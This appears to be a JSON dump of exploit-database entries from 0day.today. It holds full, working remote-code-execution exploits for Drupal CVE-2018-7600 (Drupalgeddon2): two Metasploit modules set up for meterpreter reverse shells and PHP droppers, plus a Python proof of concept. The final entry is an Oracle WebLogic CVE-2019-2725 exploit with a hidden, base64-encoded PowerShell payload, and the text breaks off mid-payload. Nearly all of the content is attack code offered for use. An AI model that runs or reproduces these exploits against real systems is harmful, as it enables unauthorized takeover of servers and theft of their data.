"cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "1337DAY-ID-30199", "href": "https://0day.today/exploit/description/30199", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon2',\r\n 'Description' => %q{\r\n CVE-2018-7600 / SA-CORE-2018-002\r\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\r\n allows remote attackers to execute arbitrary code because of an issue affecting\r\n multiple subsystems with default or common module configurations.\r\n \r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n \r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Vitalii Rudnykh', # initial PoC\r\n 'Hans Topo', # further research and ruby port\r\n 'Jos\u00e9 Ignacio Rojo' # further research and msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-002'],\r\n ['CVE', '2018-7600'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 15 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n \r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n \r\n def exploit_user_register\r\n data = Rex::MIME::Message.new\r\n data.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"')\r\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\r\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\r\n data.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"')\r\n post_data = data.to_s\r\n \r\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => \"#{uri_path}user/register\",\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data,\r\n 'vars_get' => {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => '1',\r\n '_wrapper_format' => 'drupal_ajax',\r\n }\r\n })\r\n end\r\n \r\n ##\r\n # Main\r\n ##\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n exploit_user_register\r\n else\r\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\r\n end\r\n end\r\n end\n\n# 0day.today [2018-04-18] #", "sourceHref": "https://0day.today/exploit/30199", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T23:26:54", "description": "This Metasploit module exploits a Drupal property injection in the Forms API. Drupal versions 6.x, less than 7.58, 8.2.x, less than 8.3.9, less than 8.4.6, and less than 8.5.1 are vulnerable.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "zdt", "title": "Drupal Drupalgeddon 2 Forms API Property Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30268", "href": "https://0day.today/exploit/description/30268", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n # XXX: CmdStager can't handle badchars\r\n include Msf::Exploit::PhpEXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\r\n 'Description' => %q{\r\n This module exploits a Drupal property injection in the Forms API.\r\n\r\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\r\n },\r\n 'Author' => [\r\n 'Jasper Mattsson', # Vulnerability discovery\r\n 'a2u', # Proof of concept (Drupal 8.x)\r\n 'Nixawk', # Proof of concept (Drupal 8.x)\r\n 'FireFart', # Proof of concept (Drupal 7.x)\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-7600'],\r\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\r\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\r\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\r\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\r\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\r\n ['URL', 'https://github.com/FireFart/CVE-2018-7600'],\r\n ['AKA', 'SA-CORE-2018-002'],\r\n ['AKA', 'Drupalgeddon 2']\r\n ],\r\n 'DisclosureDate' => 'Mar 28 2018',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php', 'unix', 'linux'],\r\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'Payload' => {'BadChars' => '&>\\''},\r\n # XXX: Using \"x\" in Gem::Version::new isn't technically appropriate\r\n 'Targets' => [\r\n #\r\n # Automatic targets (PHP, cmd/unix, native)\r\n #\r\n ['Automatic (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_memory\r\n ],\r\n ['Automatic (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_dropper\r\n ],\r\n ['Automatic (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_memory\r\n ],\r\n ['Automatic (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 7.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 7.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 7.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 7.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 7.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 8.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 8.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 8.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 8.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 8.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :linux_dropper\r\n ]\r\n ],\r\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\r\n 'DefaultOptions' => {'WfsDelay' => 2}\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),\r\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\r\n OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n checkcode = CheckCode::Safe\r\n\r\n if drupal_version\r\n print_status(\"Drupal #{@version} targeted at #{full_uri}\")\r\n checkcode = CheckCode::Detected\r\n else\r\n print_error('Could not determine Drupal version to target')\r\n return CheckCode::Unknown\r\n end\r\n\r\n if drupal_unpatched?\r\n print_good('Drupal appears unpatched in CHANGELOG.txt')\r\n checkcode = CheckCode::Appears\r\n end\r\n\r\n token = random_crap\r\n res = execute_command(token, func: 'printf')\r\n\r\n if res && res.body.start_with?(token)\r\n checkcode = CheckCode::Vulnerable\r\n end\r\n\r\n checkcode\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\r\n end\r\n\r\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\r\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\r\n # XXX: Naughty datastore modification\r\n datastore['DUMP_OUTPUT'] = true\r\n end\r\n\r\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\r\n case target['Type']\r\n when :php_memory\r\n execute_command(payload.encoded, func: 'assert')\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # XXX: This will spawn a *very* obvious process\r\n execute_command(\"php -r '#{payload.encoded}'\")\r\n when :unix_memory\r\n execute_command(payload.encoded)\r\n when :php_dropper, :linux_dropper\r\n dropper_assert\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n dropper_exec\r\n end\r\n end\r\n\r\n def dropper_assert\r\n php_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{random_crap}.php\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # Stage 1 decodes the PHP and writes it to disk\r\n stage1 = %Q{\r\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\r\n }\r\n\r\n # Stage 2 executes said PHP in-process\r\n stage2 = %Q{\r\n include_once(\"#{php_file}\");\r\n }\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Hopefully pop our shell with assert()\r\n execute_command(stage1.strip, func: 'assert')\r\n execute_command(stage2.strip, func: 'assert')\r\n end\r\n\r\n def dropper_exec\r\n php_file = \"#{random_crap}.php\"\r\n tmp_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{php_file}\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Write the payload or dropper to disk (!)\r\n # NOTE: Analysis indicates > is a badchar for 8.x\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\r\n\r\n # Attempt in-process execution of our PHP script\r\n send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, php_file)\r\n )\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # Try to get a shell with PHP CLI\r\n execute_command(\"php #{php_file}\")\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n register_file_for_cleanup(tmp_file)\r\n\r\n # Fall back on our temp file\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\r\n execute_command(\"php #{tmp_file}\")\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\r\n\r\n vprint_status(\"Executing with #{func}(): #{cmd}\")\r\n\r\n res =\r\n case @version.to_s\r\n when '7.x'\r\n exploit_drupal7(func, cmd)\r\n when '8.x'\r\n exploit_drupal8(func, cmd)\r\n end\r\n\r\n if res && res.code != 200\r\n print_error(\"Unexpected reply: #{res.inspect}\")\r\n return\r\n end\r\n\r\n if res && datastore['DUMP_OUTPUT']\r\n print_line(res.body)\r\n end\r\n\r\n res\r\n end\r\n\r\n def drupal_version\r\n if target['Version']\r\n @version = target['Version']\r\n return @version\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => target_uri.path\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n # Check for an X-Generator header\r\n @version =\r\n case res.headers['X-Generator']\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n\r\n return @version if @version\r\n\r\n # Check for a <meta> tag\r\n generator = res.get_html_document.at(\r\n '//meta[@name = \"Generator\"]/@content'\r\n )\r\n\r\n return unless generator\r\n\r\n @version =\r\n case generator.value\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n end\r\n\r\n def drupal_unpatched?\r\n unpatched = true\r\n\r\n # Check for patch level in CHANGELOG.txt\r\n uri =\r\n case @version.to_s\r\n when '7.x'\r\n normalize_uri(target_uri.path, 'CHANGELOG.txt')\r\n when '8.x'\r\n normalize_uri(target_uri.path, 'core/CHANGELOG.txt')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n if res.body.include?('SA-CORE-2018-002')\r\n unpatched = false\r\n end\r\n\r\n unpatched\r\n end\r\n\r\n def exploit_drupal7(func, code)\r\n vars_get = {\r\n 'q' => 'user/password',\r\n 'name[#post_render][]' => func,\r\n 'name[#markup]' => code,\r\n 'name[#type]' => 'markup'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_pass',\r\n '_triggering_element_name' => 'name'\r\n }\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n\r\n return res unless res && res.code == 200\r\n\r\n form_build_id = res.get_html_document.at(\r\n '//input[@name = \"form_build_id\"]/@value'\r\n )\r\n\r\n return res unless form_build_id\r\n\r\n vars_get = {\r\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\r\n }\r\n\r\n vars_post = {\r\n 'form_build_id' => form_build_id.value\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def exploit_drupal8(func, code)\r\n # Clean URLs are enabled by default and \"can't\" be disabled\r\n uri = normalize_uri(target_uri.path, 'user/register')\r\n\r\n vars_get = {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => 1,\r\n '_wrapper_format' => 'drupal_ajax'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_register_form',\r\n '_drupal_ajax' => 1,\r\n 'mail[#type]' => 'markup',\r\n 'mail[#post_render][]' => func,\r\n 'mail[#markup]' => code\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def random_crap\r\n Rex::Text.rand_text_alphanumeric(8..42)\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-26] #", "sourceHref": "https://0day.today/exploit/30268", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-20T19:55:56", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-04-18T00:00:00", "type": "zdt", "title": "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-18T00:00:00", "id": "1337DAY-ID-30200", "href": "https://0day.today/exploit/description/30200", "sourceData": "#!/usr/bin/env\r\nimport sys\r\nimport requests\r\n \r\nprint ('################################################################')\r\nprint ('# Proof-Of-Concept for CVE-2018-7600')\r\nprint ('# by Vitalii Rudnykh')\r\nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')\r\nprint ('# https://github.com/a2u/CVE-2018-7600')\r\nprint ('################################################################')\r\nprint ('Provided only for educational or information purposes\\n')\r\n \r\ntarget = input('Enter target url (example: https://domain.ltd/): ')\r\n \r\n# Add proxy support (eg. BURP to analyze HTTP(s) traffic)\r\n# set verify = False if your proxy certificate is self signed\r\n# remember to set proxies both for http and https\r\n# \r\n# example:\r\n# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\r\n# verify = False\r\nproxies = {}\r\nverify = True\r\n \r\nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'\r\npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo \";-)\" | tee hello.txt'}\r\n \r\nr = requests.post(url, proxies=proxies, data=payload, verify=verify)\r\ncheck = requests.get(target + 'hello.txt')\r\nif check.status_code != 200:\r\n sys.exit(\"Not exploitable\")\r\nprint ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-20] #", "sourceHref": "https://0day.today/exploit/30200", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-01T19:54:17", "description": "Exploit for windows platform in category web applications", "cvss3": {}, "published": "2019-05-01T00:00:00", "type": "zdt", "title": "Oracle #Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution Exploit #RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-01T00:00:00", "id": "1337DAY-ID-32626", "href": "https://0day.today/exploit/description/32626", "sourceData": "#!/usr/bin/python\r\n\r\n# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725\r\n# Date: 30/04/2019\r\n# Exploit Author: Avinash Kumar Thapa\r\n# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html\r\n# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html\r\n# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0\r\n# Tested on:\r\n\t#OS: Windows 2012 R2 (Build 9600).\r\n\t#Architecture : x64\r\n\t#System Language : en_US\r\n\r\n\r\n# CVE : CVE-2019-2725\r\n\r\n\r\n# Script Usage:\r\n# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps\r\n# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1\r\n# Add the powershell command in the variable\r\n\r\n__author__ = \"Avinash Kumar Thapa\"\r\n__description__ = \"\"\"\r\nVulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server\r\n\r\nCREDIT STATEMENT:\r\nThe following people or organizations reported security vulnerabilities addressed by this Security Alert to Oracle:\r\n\r\nBadcode of Knownsec 404 Team: CVE-2019-2725\r\nHongwei Pan of Minsheng Banking Corp.: CVE-2019-2725\r\nLiao Xinxi of NSFOCUS Security Team: CVE-2019-2725\r\nLin Zheng of Minsheng Banking Corp.: CVE-2019-2725\r\nSong Keya of Minsheng Banking Corp.: CVE-2019-2725\r\nTianlei Li of Minsheng Banking Corp.: CVE-2019-2725\r\nZengShuai Hao: CVE-2019-2725\r\nZhiyi Zhang of 360 ESG Codesafe Team: CVE-2019-2725\r\n\r\n\"\"\"\r\n\r\nimport requests\r\nimport sys\r\n\r\nprint \"Exploit Written by Avinash Kumar Thapa\"\r\n\r\n\r\nexploit = \"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARABQAFcAeAAxAHcAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBuAEUAagA5AEQAMQBhAEYAWgBGAHMAaABHAEIATABhAE4ASgBFAHEAMwBaAHAAWABVADUAeQBZAE8AQgBBAEkAaAAwADQAYgBlADIAMgBXAHIATAAzAEUAWABoAE8AZwAxAC8AOQArAHMAMgBDAG4ANgBUAFcAdAAyAHAAUABPADQAbQBWAGYAWgBtAFoAbgBuAG4AbABtADEAawBFAFcAZQA0AEwAeQBXAEYAawBzAHUAZgBMADUAegBlAEcAQgBnAHgATQBjAEsAVgBvAHAAYQBrADMASwBTAG0AbgBWAGEANQArAG0AKwBzAEUAQgBiAEoAUgBXAFYAawBmADUAcQBHAGgAVAB0AEYAdwAyAGUAWQBSAHAAUABMAHUANABhAEcAUgBKAFEAbQBLAHgAbgAxAGMANgBSAEsAQQAwAEoAZABFADkAbwB5AFQAVgBkAE8AVgB2ADUAWABaAE8ARQBuAEoAOABkAGIAOABnAG4AbABBACsASwA2AFcALwBLAGgAMwBHADcAegBIAEwAeABUAFkATgA3AE0AMgBKAGMAbwB4AGkAWAArADcAMQB1AFkAZQBsAE0AeABWADMAeQBhAGoAUQAxAEQALwAvAFYAUABYAHAAYwBXADEAVwBhAFQAMQBtAG0ASwBXAGEANgBtADUAUwBRAGEASwBLAHoANQBpAHEASwAxADkAMABlAGUARABOAFoAawBrADAAMQBhAFoAZQB3AGwATQBlAGkATQBvAHQAagBVADkAUABLAHMATQA0AHgAUQBHADUAQgBHAHMAcgBZAGgATQB4ADUAMwA2AHEANgBoAEEARQBmAEIASQBpAHMAaQBSAFcAWgBEAGgAUwBmADcAKwByAHEAVABCADAARQB1ADQAaAAzADAAOQBJAG0AcQBwAGwAWgBTAG8AdABUADIAZQB6AFAANwBSAHAAZgB1AHgAMQBGAGcAcwBhAGsAWQBvAFYAQwA1AEwAdwBwAFUAdQBTAEYAZgBWAEkAVwB1AG4AaQAyAEcAZgBrAG0AZwBRAHoAMABIAEoARgBRAHUATgB3AHAAdQBzAGcAdAB1AEkAUABSAEMAdgBGAEcAVwBOAGwANQBYAGYATQBhAEoAZgBrAHEAUQBEAHQAVgA1AFcAMABsADAAbwBnADUAWQBoAEUATAAwAE0AZQB2AHcALwBUADUAbgA3AEcAeQBGADUAUgBmAGMAVgBQAG0AWABvAGQAbgB1AGYAMABBADMAQgBmADMAaAB5ACsATwBRAHcASwByAHAARAB6AGwAMQBTAEIAMABjAEYAMABOAHkAYgBnAG0AKwBiAHcAbABPADYAawBQAGkAcgBWAHMAbQBMAEQATQBWAGoAdwBaAEEAUABUADAAawAyAFMARQBYADMAMgBqAEsAeABTAFMAcwBmAE4AKwAvAEsAUAA5AFcAdQBGAE0ASQBnAFMAdgB3ADgAcgAwAHgARwBuAC8AZwB3ADAAOABtAFMAVwA4AEwAZwBwAGwAMwAvAE0AeQBTAFkASgBhAEUAeQBhAG0AeABoAEgAMQBDAHQAbwBwADcAMgBHAE0AQQBrAFkAMgBjAFYAWABLAGMAUQB1AHcAUwBWAE4AegBUAGUASQAzAHkAUwBNAGgARgBoAEkAMABHAFMAaQB2ADEATgByAFIAVgBRADgANgA1AG8AWgBaAFQANQBKAGsAQQBkAFoAUwBzAEUAcgBTAEsARAArAHIAVABQADcAUABHAGkAcQBGAGQAcwBrAEEAbwBUADIAYwAyAEIAZQBLAFEAQwB5AGsAMABJADYASgAvAGkAbQBPAEYAMwBPAFEAVQBoAHQATQBKAHkAbQBaAGMAWABKAG8ATgBxADgAcwB1AEkAUwB6AEkAaABmAFYAbABDAGMAMABuAHcATABaAFkATAB2AGgAdQBwAFgAZAArADIATQBDAGUAcgBoAFYAQgBUAG0AWgBuAG8ATwBZADMANQBjAGcAOABlAHAAUwBEAEkAUABjAGcAYQBoADMANwBoAEwANABsAEgATQBKAEIASgBsAHAAVQB0ADkAWQBtADUAYwBHAGgAYgBIAHEAcQAvAGkAMABNAEMATQBRAFEAMgBBAHAAUgBYAGsAQQBWAFoAawAvAEsANgBRAFQARQBqAEEAdwAxADMAVwA5AFkAcABMAGgAQgBVAHQARwBZAGwAQQBaAGwAZgAxAGIAWQBaAEQAcQBQAEcAYwA2AFQAdgBxADQASgBEADQANgByADgAYwBMAEoAaQA4AHAANgAxAEUAbwBvAEQAZwBoAFgAdQBRAFgAcABkAHgAVQBWAFoARwBOAEIASABRAE8AeQBTAHEAdwBLAEQALwBkAHYAaQBMAHAAaQBIAGQAYQBDAFEAawBUADQATgBXAFYATQBiAFUAMwBBAGoASgA2AE4ASwBXAGUAcQAyADEASgBHAFMATwB5AGcANgBEAFIARQBEADgANwBZAFIASABKAGsANwBKACsALwBxACsAUQAyAGgAdgBqAFMAdgBhAFEAUABCAE0AcgBKAGoAWgBuAHYAbABBAGEAKwBpAEoAMQBpAHcAYgB2AGsATgA2AGEAdgBIAG0AbQBmACsAcAB0ACsAZwBhAFMAWABNADkARAA1AEMAVgBXAG4AYgBYAGEAUQA2ADYAMwBmAHEAcQA1ADQANwBxAHcAbQAxAFoANABwAE4AagBDAGIAcwAxAFgAaQB4AGMAMQBMADAAZQBUAHMAUwBkAGgAYgBvADMAdABQAG8AdwBxAFcAKwBYAFAAYgBwADEAKwA4AGkAZgByAEkAMwAzAFcAMwBQADcAVgBEAFgAWAAyADAAWABvAEIANQBOAG0ARQBJAFIAbgBnAFgAdABkAGUAOQBlAG0ALwBkAHYARwB3AEsAeQBlADQASAA2AHoAbABmAFYAdgB6AFMAZQB6AFcAawA5AGIAOQBLAGsANwBvAE0AUABCAFEANgA4AHQANwBpAGMAagBoAG8AZQBCAEUAWQA1AHIANQA1AGkAdQArADgAbABpAFYATwBQADIAMQBrAEsAbwBNAHoALwAxAHQAcgAxAGcAMQBKAG4AYgAvAG0AYgBTAHAAVwBSAGgAVgBQAHQAMABnAEEAWQBJAGYAZgBLAHUAaAA4AE4ATwB1AEEAdwA3AEsAVABMAE8AUgA0ACsATgBLAEcAeQBPAEgAVwBlAEIAawBZAFYAYQBvADAAMwB2AEgAVABNAEgAdwA3AGEASgBoAGkAMQB6AGcASwArADQAYwAzAHIAVQBOAEcAcAAzAC8AbQBPAHIAZgBUAGYARwB2AFkAagA1AG4AYQA1AFIAbQA0AHkAUgBqAHgATABqAEoAcAB6AFgAegBxADcAbQBzAGMAUQBKAGgAKwBhAGoASwBXAFYAUQAvADIANwBUAE4AawBEAEcAcQBhAE4AdQAvAFkAUgB1ADcAeAA0AEgAbgBSAEMAMQBRAEcAWQBVAGMAWQBUAGI